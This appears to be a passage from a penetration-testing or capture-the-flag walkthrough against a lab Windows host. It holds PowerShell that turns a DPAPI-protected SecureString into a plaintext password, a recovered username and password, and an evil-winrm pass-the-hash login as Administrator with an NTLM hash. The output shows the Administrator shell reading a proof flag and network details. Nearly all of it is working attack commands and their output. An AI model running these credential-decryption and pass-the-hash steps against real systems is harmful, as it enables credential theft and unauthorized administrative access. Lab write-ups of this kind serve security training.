echo "01000000d08c9ddf0115d1118c7a00c04fc2..." > cred.txt
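# No -Key/-SecureKey is given, so ConvertTo-SecureString uses DPAPI: the blob only decrypts as the user (and on the host) that created it
$pw = Get-Content cred.txt | ConvertTo-SecureString
# Copy the SecureString into an unmanaged BSTR and read it back as plaintext
$bstr = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($pw)
$UnsecurePassword = [System.Runtime.InteropServices.Marshal]::PtrToStringBSTR($bstr)
# Zero and free the unmanaged plaintext copy
[System.Runtime.InteropServices.Marshal]::ZeroFreeBSTR($bstr)
$UnsecurePassword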
jodie.summers:hHO_S9gff7ehXw
❯ evil-winrm -i 192.168.204.30 -u Administrator -H d35c4ae45bdd10a4e28ff529a2155745
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami ; type C:\Users\Administrator\Desktop\proof.txt ; ipconfig
narasec\administrator
ec48b22ae089a7d9bbb6f65ff8466179
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::fdb4:85d9:decc:67d4%4
IPv4 Address. . . . . . . . . . . : 192.168.204.30
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.204.254